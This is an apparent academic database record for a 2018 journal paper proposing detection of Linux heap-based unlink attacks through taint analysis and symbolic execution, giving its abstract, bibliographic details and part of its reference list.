Detection of Unlink Attack Based on Symbolic Execution

被引：0

作者：

Huang N. ^{[1
]}

Huang S. ^{[1
]}

Liang Z. ^{[2
]}

机构：

[1] Electronic Engineering Institute, National University of Defense Technology, Hefei, 230037, Anhui

[2] School of Automation Science and Engineering, South China University of Technology, Guangzhou, 510640, Guangdong

来源：

Huanan Ligong Daxue Xuebao/Journal of South China University of Technology (Natural Science) | 2018年 / 46卷 / 08期

关键词：

Buffer overflow; Heap-based overflow; Symbol execution; Taint analysis; Unlink attack;

D O I：

10.3969/j.issn.1000-565X.2018.08.012

中图分类号：

学科分类号：

摘要：

Unlink attack is a kind of attack through heap-based overflow vulnerability in Linux. Existing test technologies of buffer overflow determine the trigger point of the program by checking the state of program control flow and generate test cases. However, owing to the fact that the overflow data in heap rarely lead to the hijacking of program control flow and the limitations by relevant protective mechanisms, it is difficult for the existing technologies to determine whether the program satisfies the conditions of heap overflow exploit. In order to improve the security of software and achieve the detection of unlink attack, this paper summarizes the features of unlink attack according to the analysis of the unlink attack instances, establishes the detection model of unlink attack, and proposes the detection method based on the model. This method monitors the input data and sensitive operation of the program by taint analysis, builds the path constraints of tainted data and data constraints of unlink attack by symbolic execution, determines whether the program satisfies the triggering conditions of unlink attack and generates test cases by solving the above constraints. The experimental results show that this method can detect the unlink attack effectively. © 2018, Editorial Department, Journal of South China University of Technology. All right reserved.

引用

页码：81 / 87

页数：6

共 13 条

[1] Miller C., Caballero J., Berkeley U., Et al., Crash analysis with BitBlaze, Revista Mexicana De Sociología, 44, 1, pp. 81-117, (2010)
[2] Heelan S., Automatic generation of control flow hijacking exploits for software vulnerabilities, (2009)
[3] He L., Su P., Research progress on automatic exploitation of software vulnerabilities, China Education Network, 2, pp. 46-48, (2016)
[4] Avgerinos T., Sang K.C., Hao B.L.T., Et al., AEG: automatic exploit generation, Internet Society, 57, 2, pp. 1-18, (2011)
[5] Huang S.K., Huang M.H., Huang P.Y., Et al., CRAX: software crash analysis for automatic exploit generation by modeling attacks as symbolic continuations, Proceedings of IEEE the Sixth International Conference on Software Security and Reliability, pp. 78-87, (2012)
[6] Chipounov V., Kuznetsov V., Candea G., S2E: a platform for in-vivo multi-path analysis of software systems, ACM SIGPLAN Notices, 46, 3, pp. 265-278, (2011)
[7] Chipounov V., Kuznetsov V., Candea G., The S2E platform: design, implementation, and applications, ACM Transactions on Computer Systems, 30, 1, pp. 2/1-2/49, (2012)
[8] Wang M., Su P., Li Q., Et al., Automatic polymorphic exploit generation for software vulnerabilities, Proceedings of International Conference on Security and Privacy in Communication Systems, pp. 216-233, (2013)
[9] Von Hagen W., Building and installing Glibc, The Definitive Guide to GCC, pp. 247-279, (2006)
[10] Huang H., Lu Y., Liu L., Et al., A research on control-flow taint information directed symbolic execution, Journal of University of Science and Technology of China, 46, 1, pp. 21-27, (2016)

← 1 2 →